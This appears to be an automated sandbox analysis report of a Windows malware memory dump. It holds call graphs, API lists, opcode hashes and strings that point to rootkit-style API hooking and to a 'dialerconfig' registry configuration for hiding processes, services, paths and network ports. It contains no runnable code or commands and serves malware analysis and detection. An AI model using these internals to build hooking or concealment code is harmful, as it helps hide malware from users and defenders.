Is_bad_exception_allowed 8830->8832 8831->8830 8832->8830 8834 280923894bf 8833->8834 8835 280923894e8 RtlPcToFileHeader 8834->8835 8836 2809238950a RaiseException 8834->8836 8837 28092389500 8835->8837 8836->8752 8837->8836 8839 28092389944 __GetUnwindTryBlock RtlLookupFunctionEntry 8838->8839 8840 2809238a0df 8839->8840 8840->8774 8840->8775 8842 28092389944 __GetUnwindTryBlock RtlLookupFunctionEntry 8841->8842 8843 2809238a11e 8842->8843 8843->8778 8845 28092389634 _CreateFrameInfo 5 API calls 8844->8845 8846 28092389828 8845->8846 8846->8830 9289 28092394dfd 9290 28092389c90 __CxxCallCatchBlock 5 API calls 9289->9290 9296 28092394e10 9290->9296 9291 28092389634 _CreateFrameInfo 5 API calls 9292 28092394e63 9291->9292 9293 28092389634 _CreateFrameInfo 5 API calls 9292->9293 9295 28092394e73 9293->9295 9294 28092389320 __CxxCallCatchBlock 5 API calls 9297 28092394e4f __CxxCallCatchBlock 9294->9297 9296->9294 9296->9297 9297->9291 9298 280923827fc 9300 28092382842 9298->9300 9299 280923828a8 9300->9299 9301 28092383844 StrCmpNIW 9300->9301 9301->9300 8432 2809238f2fc 8433 2809238f31e 8432->8433 8436 2809238f33b 8432->8436 8434 2809238f32c 8433->8434 8433->8436 8435 2809238d6ac __std_exception_copy 5 API calls 8434->8435 8438 2809238f331 8435->8438 8439 28092391af4 8436->8439 8440 28092391b09 8439->8440 8441 28092391b13 8439->8441 8442 2809238ca0c 5 API calls 8440->8442 8443 28092391b18 8441->8443 8444 28092391b1f __std_exception_copy 8441->8444 8445 28092391b11 8442->8445 8446 2809238d744 Concurrency::details::SchedulerProxy::DeleteThis 5 API calls 8443->8446 8447 28092391b52 HeapReAlloc 8444->8447 8448 28092391b25 8444->8448 8445->8438 8446->8445 8447->8444 8447->8445 8449 2809238d6ac __std_exception_copy 5 API calls 8448->8449 8449->8445 7661 28092385cf0 7662 28092385cfd 7661->7662 7663 28092385d09 7662->7663 7670 28092385e1a 7662->7670 7664 28092385d3e 7663->7664 7665 28092385d8d 7663->7665 7666 28092385d66 SetThreadContext 7664->7666 7666->7665 7667 28092385efe 7669 28092385f1e 7667->7669 7683 280923843e0 7667->7683 7668 28092385e41 VirtualProtect FlushInstructionCache 7668->7670 7679 28092384df0 GetCurrentProcess 7669->7679 7670->7667 7670->7668 7673 28092385f23 7674 28092385f77 7673->7674 7675 28092385f37 ResumeThread 7673->7675 7687 28092387940 7674->7687 7676 28092385f6b 7675->7676 7676->7673 7678 28092385fbf 7680 28092384e0c 7679->7680 7681 28092384e22 VirtualProtect FlushInstructionCache 7680->7681 7682 28092384e53 7680->7682 7681->7680 7682->7673 7685 280923843fc 7683->7685 7684 2809238445f 7684->7669 7685->7684 7686 28092384412 VirtualFree 7685->7686 7686->7685 7688 28092387949 7687->7688 7689 28092387954 7688->7689 7690 2809238812c IsProcessorFeaturePresent 7688->7690 7689->7678 7691 28092388144 7690->7691 7694 28092388320 RtlCaptureContext 7691->7694 7693 28092388157 7693->7678 7695 2809238833a RtlLookupFunctionEntry 7694->7695 7696 28092388389 7695->7696 7697 28092388350 RtlVirtualUnwind 7695->7697 7696->7693 7697->7695 7697->7696 8847 2809238bb71 8848 2809238c6a8 15 API calls 8847->8848 8849 2809238bb76 8848->8849 8850 2809238bb9d GetModuleHandleW 8849->8850 8851 2809238bbe7 8849->8851 8850->8851 8856 2809238bbaa 8850->8856 8864 2809238ba74 8851->8864 8853 2809238bc23 8854 2809238bc2a 8853->8854 8868 2809238bc40 8853->8868 8856->8851 8859 2809238bc98 GetModuleHandleExW 8856->8859 8860 2809238bccc GetProcAddress 8859->8860 8863 2809238bcde _invalid_parameter_noinfo 8859->8863 8860->8863 8861 2809238bcfa FreeLibrary 8862 2809238bd01 8861->8862 8862->8851 8863->8861 8863->8862 8865 2809238ba90 8864->8865 8875 2809238baac 8865->8875 8867 2809238ba99 8867->8853 8890 2809238bc74 8868->8890 8870 2809238bc4d 8871 2809238bc51 GetCurrentProcess TerminateProcess 8870->8871 8872 2809238bc62 8870->8872 8871->8872 8873 2809238bc98 3 API calls 8872->8873 8874 2809238bc69 ExitProcess 8873->8874 8876 2809238bb25 8875->8876 8877 2809238bac2 _invalid_parameter_noinfo 8875->8877 8876->8867 8877->8876 8879 2809238c48c 8877->8879 8882 2809238c330 8879->8882 8881 2809238c4c9 8881->8876 8883 2809238c34c 8882->8883 8886 2809238c36c 8883->8886 8885 2809238c355 8885->8881 8887 2809238c39a _invalid_parameter_noinfo 8886->8887 8888 2809238c392 8886->8888 8887->8888 8889 2809238d744 Concurrency::details::SchedulerProxy::DeleteThis 5 API calls 8887->8889 8888->8885 8889->8888 8893 2809238d1bc 8890->8893 8892 2809238bc7d 8892->8870 8895 2809238d1cd 8893->8895 8894 2809238d1db 8894->8892 8895->8894 8897 2809238f550 8895->8897 8898 2809238f394 4 API calls 8897->8898 8899 2809238f578 8898->8899 8899->8894 8450 280923906f0 8453 28092390674 8450->8453 8452 28092390719 8454 28092390692 8453->8454 8455 280923906cb 8454->8455 8456 28092390acc _invalid_parameter_noinfo 5 API calls 8454->8456 8455->8452 8456->8454 8900 28092383774 8903 280923836c8 8900->8903 8904 280923836db GetModuleHandleW 8903->8904 8905 2809238376d FreeLibraryAndExitThread 8903->8905 8906 28092383759 TerminateThread 8904->8906 8907 280923836f2 GetCurrentProcess VirtualProtectEx 8904->8907 8910 28092381e6c 8906->8910 8907->8906 8908 2809238371e GetCurrentProcess VirtualProtectEx 8907->8908 8908->8906 8937 28092385ab0 8910->8937 8914 28092381e88 8915 28092381ea8 8914->8915 8947 28092385710 GetCurrentThreadId 8914->8947 8917 28092381ec8 8915->8917 8918 28092385710 5 API calls 8915->8918 8919 28092381ee8 8917->8919 8920 28092385710 5 API calls 8917->8920 8918->8917 8921 28092381f08 8919->8921 8922 28092385710 5 API calls 8919->8922 8920->8919 8923 28092385710 5 API calls 8921->8923 8925 28092381f28 8921->8925 8922->8921 8923->8925 8924 28092381f48 8926 28092381f68 8924->8926 8928 28092385710 5 API calls 8924->8928 8925->8924 8927 28092385710 5 API calls 8925->8927 8929 28092381f88 8926->8929 8930 28092385710 5 API calls 8926->8930 8927->8924 8928->8926 8931 28092381fa8 8929->8931 8932 28092385710 5 API calls 8929->8932 8930->8929 8933 28092381fc8 8931->8933 8934 28092385710 5 API calls 8931->8934 8932->8931 8954 28092385b30 8933->8954 8934->8933 8936 28092385b2b 8936->8905 8938 28092381e7a GetCurrentThread 8937->8938 8939 28092385ac4 8937->8939 8941 28092385fd0 8938->8941 8939->8938 8977 28092385030 8939->8977 8942 28092385fe2 8941->8942 8943 28092385fed 8941->8943 8942->8914 8943->8942 8982 28092387870 8943->8982 8945 2809238600a 8945->8942 8946 2809238607d GetLastError 8945->8946 8946->8942 8948 2809238573d 8947->8948 8950 28092385733 8947->8950 8949 28092387870 2 API calls 8948->8949 8948->8950 8953 280923857b1 type_info::_name_internal_method 8949->8953 8950->8915 8951 280923858c0 VirtualProtect 8951->8950 8952 280923858e9 GetLastError 8951->8952 8952->8950 8953->8950 8953->8951 8955 28092385b59 8954->8955 8956 28092385b6b GetCurrentThreadId 8954->8956 8955->8956 8957 28092385b78 8956->8957 8958 28092385b82 8956->8958 8960 28092387940 _log10_special 4 API calls 8957->8960 8959 28092385b8b 8958->8959 8965 28092385b9b 8958->8965 8997 28092385960 GetCurrentThreadId 8959->8997 8962 28092385fbf 8960->8962 8962->8936 8963 28092385cbc GetThreadContext 8964 28092385ce2 8963->8964 8971 28092385e1a 8963->8971 8969 28092385d09 8964->8969 8964->8971 8965->8963 8965->8971 8966 28092385efe 8968 28092385f1e 8966->8968 8973 280923843e0 VirtualFree 8966->8973 8967 28092385e41 VirtualProtect FlushInstructionCache 8967->8971 8970 28092384df0 3 API calls 8968->8970 8972 28092385d8d 8969->8972 8975 28092385d66 SetThreadContext 8969->8975 8974 28092385f23 8970->8974 8971->8966 8971->8967 8972->8936 8973->8968 8974->8957 8976 28092385f37 ResumeThread 8974->8976 8975->8972 8976->8974 8980 28092385042 8977->8980 8978 28092385058 VirtualProtect 8978->8980 8981 28092385076 GetLastError 8978->8981 8979 2809238507f 8979->8938 8980->8978 8980->8979 8981->8979 8984 2809238787b __std_exception_copy 8982->8984 8983 28092387894 8983->8945 8984->8983 8985 280923878a5 8984->8985 8989 2809238809c 8984->8989 8993 280923880bc 8985->8993 8990 280923880aa std::bad_alloc::bad_alloc 8989->8990 8991 280923894a0 Concurrency::cancel_current_task 2 API calls 8990->8991 8992 280923880bb 8991->8992 8994 280923880ca std::bad_alloc::bad_alloc 8993->8994 8995 280923894a0 Concurrency::cancel_current_task 2 API calls 8994->8995 8996 280923878ab 8995->8996 8998 28092385971 8997->8998 9001 2809238597b 8997->9001 8998->8957 8999 28092385993 VirtualProtect 8999->9001 9000 28092385a25 9002 28092384df0 3 API calls 9000->9002 9001->8999 9001->9000 9004 28092385a35 9002->9004 9003 28092385a49 ResumeThread 9003->9004 9004->8998 9004->9003 9484 28092390268 9485 28092390292 9484->9485 9486 2809238d6cc __std_exception_copy 5 API calls 9485->9486 9487 280923902b1 9486->9487 9488 2809238d744 Concurrency::details::SchedulerProxy::DeleteThis 5 API calls 9487->9488 9489 280923902bf 9488->9489 9490 2809238d6cc __std_exception_copy 5 API calls 9489->9490 9493 280923902e9 9489->9493 9492 280923902db 9490->9492 9491 2809238f60c 5 API calls 9491->9493 9494 2809238d744 Concurrency::details::SchedulerProxy::DeleteThis 5 API calls 9492->9494 9493->9491 9495 280923902f2 9493->9495 9494->9493 9302 2809238f7ec 9303 2809238f825 9302->9303 9305 2809238f7f6 9302->9305 9304 2809238f80b FreeLibrary 9304->9305 9305->9303 9305->9304 9306 28092383be0 9307 28092383b2d 9306->9307 9308 28092383b97 9307->9308 9309 28092383b7d VirtualQuery 9307->9309 9310 28092383be2 GetLastError 9307->9310 9309->9307 9309->9308 9310->9307 9310->9308 9311 280923949e0 9312 28092394a18 __GSHandlerCheckCommon 9311->9312 9313 28092394a44 9312->9313 9315 28092389d3c 9312->9315 9316 28092389634 _CreateFrameInfo 5 API calls 9315->9316 9317 28092389d66 9316->9317 9318 28092389634 _CreateFrameInfo 5 API calls 9317->9318 9319 28092389d73 9318->9319 9320 28092389634 _CreateFrameInfo 5 API calls 9319->9320 9321 28092389d7c 9320->9321 9321->9313 9496 28092394a60 9506 28092388fe8 9496->9506 9498 28092394a88 9500 28092389634 _CreateFrameInfo 5 API calls 9501 28092394a98 9500->9501 9502 28092389634 _CreateFrameInfo 5 API calls 9501->9502 9503 28092394aa1 9502->9503 9504 2809238c6a8 15 API calls 9503->9504 9505 28092394aaa 9504->9505 9509 28092389018 __CxxCallCatchBlock _IsNonwritableInCurrentImage __except_validate_context_record 9506->9509 9507 28092389109 9507->9498 9507->9500 9508 280923890d4 RtlUnwindEx 9508->9509 9509->9507 9509->9508 8457 2809238c0e4 8458 2809238c0fd 8457->8458 8471 2809238c0f9 8457->8471 8459 2809238ec90 38 API calls 8458->8459 8460 2809238c102 8459->8460 8472 2809238f1ec GetEnvironmentStringsW 8460->8472 8463 2809238c11b 8488 2809238c158 8463->8488 8464 2809238c10f 8466 2809238d744 Concurrency::details::SchedulerProxy::DeleteThis 5 API calls 8464->8466 8466->8471 8468 2809238d744 Concurrency::details::SchedulerProxy::DeleteThis 5 API calls 8469 2809238c142 8468->8469 8470 2809238d744 Concurrency::details::SchedulerProxy::DeleteThis 5 API calls 8469->8470 8470->8471 8473 2809238c107 8472->8473 8474 2809238f21c 8472->8474 8473->8463 8473->8464 8475 2809238f274 FreeEnvironmentStringsW 8474->8475 8476 2809238ca0c 5 API calls 8474->8476 8475->8473 8477 2809238f287 8476->8477 8478 2809238f298 8477->8478 8479 2809238f28f 8477->8479 8482 2809238f2c9 8478->8482 8483 2809238f2bf 8478->8483 8480 2809238d744 Concurrency::details::SchedulerProxy::DeleteThis 5 API calls 8479->8480 8481 2809238f296 8480->8481 8481->8475 8485 2809238d744 Concurrency::details::SchedulerProxy::DeleteThis 5 API calls 8482->8485 8484 2809238d744 Concurrency::details::SchedulerProxy::DeleteThis 5 API calls 8483->8484 8486 2809238f2c7 FreeEnvironmentStringsW 8484->8486 8485->8486 8486->8473 8489 2809238c17d 8488->8489 8490 2809238d6cc __std_exception_copy 5 API calls 8489->8490 8501 2809238c1b3 8490->8501 8491 2809238c1bb 8492 2809238d744 Concurrency::details::SchedulerProxy::DeleteThis 5 API calls 8491->8492 8493 2809238c123 8492->8493 8493->8468 8494 2809238c22e 8495 2809238d744 Concurrency::details::SchedulerProxy::DeleteThis 5 API calls 8494->8495 8495->8493 8496 2809238d6cc __std_exception_copy 5 API calls 8496->8501 8497 2809238c21d 8514 2809238c268 8497->8514 8501->8491 8501->8494 8501->8496 8501->8497 8502 2809238c253 8501->8502 8504 2809238d744 Concurrency::details::SchedulerProxy::DeleteThis 5 API calls 8501->8504 8505 2809238c6e8 8501->8505 8503 2809238d744 Concurrency::details::SchedulerProxy::DeleteThis 5 API calls 8503->8491 8504->8501 8506 2809238c6ff 8505->8506 8507 2809238c6f5 8505->8507 8508 2809238d6ac __std_exception_copy 5 API calls 8506->8508 8507->8506 8511 2809238c71a 8507->8511 8513 2809238c706 8508->8513 8509 2809238d570 _invalid_parameter_noinfo 18 API calls 8510 2809238c712 8509->8510 8510->8501 8511->8510 8512 2809238d6ac __std_exception_copy 5 API calls 8511->8512 8512->8513 8513->8509 8518 2809238c26d 8514->8518 8519 2809238c225 8514->8519 8515 2809238c296 8517 2809238d744 Concurrency::details::SchedulerProxy::DeleteThis 5 API calls 8515->8517 8516 2809238d744 Concurrency::details::SchedulerProxy::DeleteThis 5 API calls 8516->8518 8517->8519 8518->8515 8518->8516 8519->8503 9510 2809238cc64 9511 2809238cc69 9510->9511 9512 2809238cc7e 9510->9512 9516 2809238cc84 9511->9516 9515 2809238d744 Concurrency::details::SchedulerProxy::DeleteThis 5 API calls 9515->9512 9517 2809238ccce 9516->9517 9518 2809238ccc6 9516->9518 9520 2809238d744 Concurrency::details::SchedulerProxy::DeleteThis 5 API calls 9517->9520 9519 2809238d744 Concurrency::details::SchedulerProxy::DeleteThis 5 API calls 9518->9519 9519->9517 9521 2809238ccdb 9520->9521 9522 2809238d744 Concurrency::details::SchedulerProxy::DeleteThis 5 API calls 9521->9522 9523 2809238cce8 9522->9523 9524 2809238d744 Concurrency::details::SchedulerProxy::DeleteThis 5 API calls 9523->9524 9525 2809238ccf5 9524->9525 9526 2809238d744 Concurrency::details::SchedulerProxy::DeleteThis 5 API calls 9525->9526 9527 2809238cd02 9526->9527 9528 2809238d744 Concurrency::details::SchedulerProxy::DeleteThis 5 API calls 9527->9528 9529 2809238cd0f 9528->9529 9530 2809238d744 Concurrency::details::SchedulerProxy::DeleteThis 5 API calls 9529->9530 9531 2809238cd1c 9530->9531 9532 2809238d744 Concurrency::details::SchedulerProxy::DeleteThis 5 API calls 9531->9532 9533 2809238cd29 9532->9533 9534 2809238d744 Concurrency::details::SchedulerProxy::DeleteThis 5 API calls 9533->9534 9535 2809238cd39 9534->9535 9536 2809238d744 Concurrency::details::SchedulerProxy::DeleteThis 5 API calls 9535->9536 9537 2809238cd49 9536->9537 9542 2809238cb34 9537->9542 9539 2809238cd5e 9546 2809238caac 9539->9546 9541 2809238cc76 9541->9515 9543 2809238cb50 9542->9543 9544 2809238cb80 9543->9544 9545 2809238d744 Concurrency::details::SchedulerProxy::DeleteThis 5 API calls 9543->9545 9544->9539 9545->9544 9547 2809238cac8 9546->9547 9548 2809238cd7c Concurrency::details::SchedulerProxy::DeleteThis 5 API calls 9547->9548 9549 2809238cad6 9548->9549 9549->9541 9322 28092394dd8 9325 2809238b200 9322->9325 9326 2809238b270 9325->9326 9327 2809238b21f 9325->9327 9327->9326 9328 28092389634 _CreateFrameInfo 5 API calls 9327->9328 9328->9326 8520 28092387adc 8527 2809238925c 8520->8527 8523 28092387ae9 8528 28092389650 _CreateFrameInfo 5 API calls 8527->8528 8529 28092387ae5 8528->8529 8529->8523 8530 2809238c63c 8529->8530 8531 2809238cfa0 __std_exception_copy 5 API calls 8530->8531 8532 28092387af2 8531->8532 8532->8523 8533 28092389270 8532->8533 8536 280923895ec 8533->8536 8535 28092389279 8535->8523 8537 280923895fd 8536->8537 8539 28092389612 __vcrt_freefls 8536->8539 8538 28092389fec _CreateFrameInfo 5 API calls 8537->8538 8538->8539 8539->8535 9550 28092394c51 __scrt_dllmain_exception_filter 9551 2809238fa50 9552 2809238fa60 9551->9552 9559 28092391d0c 9552->9559 9554 2809238fa69 9555 2809238fa77 9554->9555 9567 2809238f858 GetStartupInfoW 9554->9567 9560 28092391d2b 9559->9560 9561 28092391d54 9559->9561 9562 2809238d6ac __std_exception_copy 5 API calls 9560->9562 9565 28092391d3c 9561->9565 9578 28092391c14 9561->9578 9563 28092391d30 9562->9563 9564 2809238d570 _invalid_parameter_noinfo 18 API calls 9563->9564 9564->9565 9565->9554 9568 2809238f88d 9567->9568 9569 2809238f927 9567->9569 9568->9569 9570 28092391d0c 23 API calls 9568->9570 9573 2809238f948 9569->9573 9571 2809238f8b6 9570->9571 9571->9569 9572 2809238f8e0 GetFileType 9571->9572 9572->9571 9575 2809238f966 9573->9575 9574 2809238fa35 9574->9555 9575->9574 9576 2809238f9c1 GetStdHandle 9575->9576 9576->9575 9577 2809238f9d4 GetFileType 9576->9577 9577->9575 9579 2809238d6cc __std_exception_copy 5 API calls 9578->9579 9583 28092391c35 9579->9583 9580 28092391c97 9581 2809238d744 Concurrency::details::SchedulerProxy::DeleteThis 5 API calls 9580->9581 9582 28092391ca1 9581->9582 9582->9561 9583->9580 9584 2809238f60c 5 API calls 9583->9584 9584->9583 9005 2809238c954 9007 2809238c95c 9005->9007 9008 2809238c98d 9007->9008 9009 2809238c989 9007->9009 9011 2809238f60c 9007->9011 9016 2809238c9b8 9008->9016 9012 2809238f394 4 API calls 9011->9012 9013 2809238f642 9012->9013 9014 2809238f661 InitializeCriticalSectionAndSpinCount 9013->9014 9015 2809238f647 _invalid_parameter_noinfo 9013->9015 9014->9015 9015->9007 9017 2809238c9e3 9016->9017 9018 2809238c9e7 9017->9018 9019 2809238c9c6 DeleteCriticalSection 9017->9019 9018->9009 9019->9017 9585 2809238f054 GetCommandLineA GetCommandLineW 9020 28092387f56 9023 280923893e8 9020->9023 9022 28092387f81 9024 2809238943e __vcrt_freefls 9023->9024 9025 28092389409 9023->9025 9024->9022 9025->9024 9026 2809238c6e8 __std_exception_copy 18 API calls 9025->9026 9026->9024 7563 280923828c8 7564 2809238290e 7563->7564 7565 28092382970 7564->7565 7567 28092383844 7564->7567 7568 28092383851 StrCmpNIW 7567->7568 7569 28092383866 7567->7569 7568->7569 7569->7564 7655 2809238554d 7657 28092385554 7655->7657 7656 280923855bb 7657->7656 7658 28092385637 VirtualProtect 7657->7658 7659 28092385671 7658->7659 7660 28092385663 GetLastError 7658->7660 7660->7659 9329 2809238c5cc 9330 2809238d744 Concurrency::details::SchedulerProxy::DeleteThis 5 API calls 9329->9330 9331 2809238c5dc 9330->9331 9332 2809238d744 Concurrency::details::SchedulerProxy::DeleteThis 5 API calls 9331->9332 9333 2809238c5f0 9332->9333 9334 2809238d744 Concurrency::details::SchedulerProxy::DeleteThis 5 API calls 9333->9334 9335 2809238c604 9334->9335 9336 2809238d744 Concurrency::details::SchedulerProxy::DeleteThis 5 API calls 9335->9336 9337 2809238c618 9336->9337 8540 28092391ac1 8541 2809238d6ac __std_exception_copy 5 API calls 8540->8541 8542 28092391ac6 8541->8542 8543 2809238d570 _invalid_parameter_noinfo 18 API calls 8542->8543 8544 28092391ad1 8543->8544 9027 28092390b40 9028 28092390b6d 9027->9028 9029 2809238d6ac __std_exception_copy 5 API calls 9028->9029 9034 28092390b82 _invalid_parameter_noinfo 9028->9034 9030 28092390b77 9029->9030 9031 2809238d570 _invalid_parameter_noinfo 18 API calls 9030->9031 9031->9034 9032 28092387940 _log10_special 4 API calls 9033 28092390f40 9032->9033 9034->9032 9586 2809238fc40 9587 2809238fc70 9586->9587 9595 2809238fc97 9586->9595 9588 2809238cfa0 __std_exception_copy 5 API calls 9587->9588 9590 2809238fc84 9587->9590 9587->9595 9588->9590 9589 2809238fcd4 9590->9589 9591 2809238fd19 9590->9591 9590->9595 9592 2809238d6ac __std_exception_copy 5 API calls 9591->9592 9594 2809238fd1e 9592->9594 9593 2809238fea0 9596 2809238d570 _invalid_parameter_noinfo 18 API calls 9594->9596 9595->9593 9597 2809238ce28 _invalid_parameter_noinfo 15 API calls 9595->9597 9600 2809238fdd3 9595->9600 9596->9589 9598 2809238fdc3 9597->9598 9599 2809238ce28 _invalid_parameter_noinfo 15 API calls 9598->9599 9599->9600 9601 2809238ce28 15 API calls _invalid_parameter_noinfo 9600->9601 9601->9600 9602 28092391040 9603 2809239105f 9602->9603 9604 280923910d8 9603->9604 9607 2809239106f 9603->9607 9610 28092388200 9604->9610 9608 28092387940 _log10_special 4 API calls 9607->9608 9609 280923910ce 9608->9609 9613 28092388214 IsProcessorFeaturePresent 9610->9613 9612 2809238820e 9614 2809238822b 9613->9614 9617 280923882b0 RtlCaptureContext RtlLookupFunctionEntry 9614->9617 9616 2809238823f 9616->9612 9618 280923882e0 RtlVirtualUnwind 9617->9618 9619 28092388312 9617->9619 9618->9619 9619->9616 9620 28092382244 GetProcessIdOfThread GetCurrentProcessId 9621 28092382312 9620->9621 9622 28092382275 9620->9622 9627 28092381934 OpenProcess 9622->9627 9625 28092382287 CreateFileW 9625->9621 9626 280923822cb WriteFile ReadFile CloseHandle 9625->9626 9626->9621 9628 28092381989 9627->9628 9629 28092381960 IsWow64Process 9627->9629 9628->9621 9628->9625 9630 28092381980 CloseHandle 9629->9630 9631 28092381972 9629->9631 9630->9628 9631->9630

                                                                                                                                                                                                      Executed Functions

                                                                                                                                                                                                      Function 0000028092381628 Relevance: 50.9, APIs: 20, Strings: 9, Instructions: 157registrymemoryCOMMON
                                                                                                                                                                                                      Download Yara Rule

                                                                                                                                                                                                      Control-flow Graph

                                                                                                                                                                                                      APIs
                                                                                                                                                                                                      Strings
                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                      • Source File: 00000083.00000002.2489519243.0000028092380000.00000040.00000001.00020000.00000000.sdmp, Offset: 0000028092380000, based on PE: true
                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                      • API ID: Heap$CloseOpen$Process$Alloc$EnumFreeInfoQueryValuelstrlen
                                                                                                                                                                                                      • String ID: SOFTWARE\dialerconfig$paths$pid$process_names$service_names$startup$tcp_local$tcp_remote$udp
                                                                                                                                                                                                      • API String ID: 106492572-2879589442
                                                                                                                                                                                                      • Opcode ID: 29d8c56dd48d9a3b38e8b79419d4f3e68f34e96909367841420a970a2341c6d0
                                                                                                                                                                                                      • Instruction ID: 94c52070c3881526f7593c9bf3c8e51c4cd2171368668e964aaf77fd85e4ae86
                                                                                                                                                                                                      • Opcode Fuzzy Hash: 29d8c56dd48d9a3b38e8b79419d4f3e68f34e96909367841420a970a2341c6d0
                                                                                                                                                                                                      • Instruction Fuzzy Hash: D9710C3E312E10C6EB90AF65E8DA6592364F789F88F00D111EE5E57B6ADF74C498C740
                                                                                                                                                                                                      Uniqueness

                                                                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                                                                      Function 0000028092383790 Relevance: 10.5, APIs: 5, Strings: 1, Instructions: 44COMMON
                                                                                                                                                                                                      Download Yara Rule

                                                                                                                                                                                                      Control-flow Graph

                                                                                                                                                                                                      APIs
                                                                                                                                                                                                      Strings
                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                      • Source File: 00000083.00000002.2489519243.0000028092380000.00000040.00000001.00020000.00000000.sdmp, Offset: 0000028092380000, based on PE: true
                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                      • API ID: CurrentProcessProtectVirtual$HandleModule
                                                                                                                                                                                                      • String ID: wr
                                                                                                                                                                                                      • API String ID: 1092925422-2678910430
                                                                                                                                                                                                      • Opcode ID: d5ed198cecc284837a9554765ab7ffb778fa62629811cf0fe5ebc999f83bf42b
                                                                                                                                                                                                      • Instruction ID: 910cf10088f07d818205b0dc3785495817490d3ddf8d2c7af839f7822f648744
                                                                                                                                                                                                      • Opcode Fuzzy Hash: d5ed198cecc284837a9554765ab7ffb778fa62629811cf0fe5ebc999f83bf42b
                                                                                                                                                                                                      • Instruction Fuzzy Hash: F5113C2E706B41C2EF949B11E48966962A0F789FC5F44C029EEAD07756EF3DC549CB04
                                                                                                                                                                                                      Uniqueness

                                                                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                                                                      Function 0000028092385B30 Relevance: 9.2, APIs: 6, Instructions: 240threadCOMMON
                                                                                                                                                                                                      Download Yara Rule

                                                                                                                                                                                                      Control-flow Graph

                                                                                                                                                                                                      • Executed
                                                                                                                                                                                                      • Not Executed
                                                                                                                                                                                                      control_flow_graph 59 28092385b30-28092385b57 60 28092385b59-28092385b68 59->60 61 28092385b6b-28092385b76 GetCurrentThreadId 59->61 60->61 62 28092385b78-28092385b7d 61->62 63 28092385b82-28092385b89 61->63 64 28092385faf-28092385fc6 call 28092387940 62->64 65 28092385b9b-28092385baf 63->65 66 28092385b8b-28092385b96 call 28092385960 63->66 69 28092385bbe-28092385bc4 65->69 66->64 72 28092385bca-28092385bd3 69->72 73 28092385c95-28092385cb6 69->73 74 28092385c1a-28092385c8d call 28092384510 call 280923844b0 call 28092384470 72->74 75 28092385bd5-28092385c18 call 280923885c0 72->75 78 28092385cbc-28092385cdc GetThreadContext 73->78 79 28092385e1f-28092385e30 call 280923874bf 73->79 86 28092385c90 74->86 75->86 82 28092385e1a 78->82 83 28092385ce2-28092385d03 78->83 93 28092385e35-28092385e3b 79->93 82->79 83->82 90 28092385d09-28092385d12 83->90 86->69 94 28092385d92-28092385da3 90->94 95 28092385d14-28092385d25 90->95 97 28092385efe-28092385f0e 93->97 98 28092385e41-28092385e98 VirtualProtect FlushInstructionCache 93->98 99 28092385e15 94->99 100 28092385da5-28092385dc3 94->100 103 28092385d8d 95->103 104 28092385d27-28092385d3c 95->104 101 28092385f1e-28092385f2a call 28092384df0 97->101 102 28092385f10-28092385f17 97->102 106 28092385ec9-28092385ef9 call 280923878ac 98->106 107 28092385e9a-28092385ea4 98->107 100->99 108 28092385dc5-28092385e0c call 28092383900 100->108 123 28092385f2f-28092385f35 101->123 102->101 110 28092385f19 call 280923843e0 102->110 103->99 104->103 111 28092385d3e-28092385d88 call 28092383970 SetThreadContext 104->111 106->93 107->106 113 28092385ea6-28092385ec1 call 28092384390 107->113 108->99 124 28092385e10 call 280923874dd 108->124 110->101 111->103 113->106 125 28092385f77-28092385f95 123->125 126 28092385f37-28092385f75 ResumeThread call 280923878ac 123->126 124->99 127 28092385fa9 125->127 128 28092385f97-28092385fa6 125->128 126->123 127->64 128->127
                                                                                                                                                                                                      APIs
                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                      • Source File: 00000083.00000002.2489519243.0000028092380000.00000040.00000001.00020000.00000000.sdmp, Offset: 0000028092380000, based on PE: true
                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                      • API ID: Thread$Current$Context
                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                      • API String ID: 1666949209-0
                                                                                                                                                                                                      • Opcode ID: aba7c51250b0bd2785b454d2868164715ffdc60c22b63475f1bba81942d6465a
                                                                                                                                                                                                      • Instruction ID: b00891b11345b540f5922887309db12dbb6122afa035a556f0834e5b8cebc8a7
                                                                                                                                                                                                      • Opcode Fuzzy Hash: aba7c51250b0bd2785b454d2868164715ffdc60c22b63475f1bba81942d6465a
                                                                                                                                                                                                      • Instruction Fuzzy Hash: 06D1787A205B8882DBB0DB06E49935A77B0F78CF84F118116EADD47BA6DF38C555CB40
                                                                                                                                                                                                      Uniqueness

                                                                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                                                                      Function 00000280923850D0 Relevance: 7.8, APIs: 5, Instructions: 318threadCOMMON
                                                                                                                                                                                                      Download Yara Rule

                                                                                                                                                                                                      Control-flow Graph

                                                                                                                                                                                                      • Executed
                                                                                                                                                                                                      • Not Executed
                                                                                                                                                                                                      control_flow_graph 131 280923850d0-280923850fc 132 2809238510d-28092385116 131->132 133 280923850fe-28092385106 131->133 134 28092385118-28092385120 132->134 135 28092385127-28092385130 132->135 133->132 134->135 136 28092385141-2809238514a 135->136 137 28092385132-2809238513a 135->137 138 2809238514c-28092385151 136->138 139 28092385156-28092385161 GetCurrentThreadId 136->139 137->136 140 280923856d3-280923856da 138->140 141 2809238516d-28092385174 139->141 142 28092385163-28092385168 139->142 143 28092385181-2809238518a 141->143 144 28092385176-2809238517c 141->144 142->140 145 2809238518c-28092385191 143->145 146 28092385196-280923851a2 143->146 144->140 145->140 147 280923851ce-28092385225 call 280923856e0 * 2 146->147 148 280923851a4-280923851c9 146->148 153 2809238523a-28092385243 147->153 154 28092385227-2809238522e 147->154 148->140 157 28092385255-2809238525e 153->157 158 28092385245-28092385252 153->158 155 28092385230 154->155 156 28092385236 154->156 159 280923852b0-280923852b6 155->159 160 280923852a6-280923852aa 156->160 161 28092385260-28092385270 157->161 162 28092385273-28092385298 call 28092387870 157->162 158->157 164 280923852b8-280923852d4 call 28092384390 159->164 165 280923852e5-280923852eb 159->165 160->159 161->162 172 2809238532d-28092385342 call 28092383cc0 162->172 173 2809238529e 162->173 164->165 174 280923852d6-280923852de 164->174 166 280923852ed-2809238530c call 280923878ac 165->166 167 28092385315-28092385328 165->167 166->167 167->140 178 28092385351-2809238535a 172->178 179 28092385344-2809238534c 172->179 173->160 174->165 180 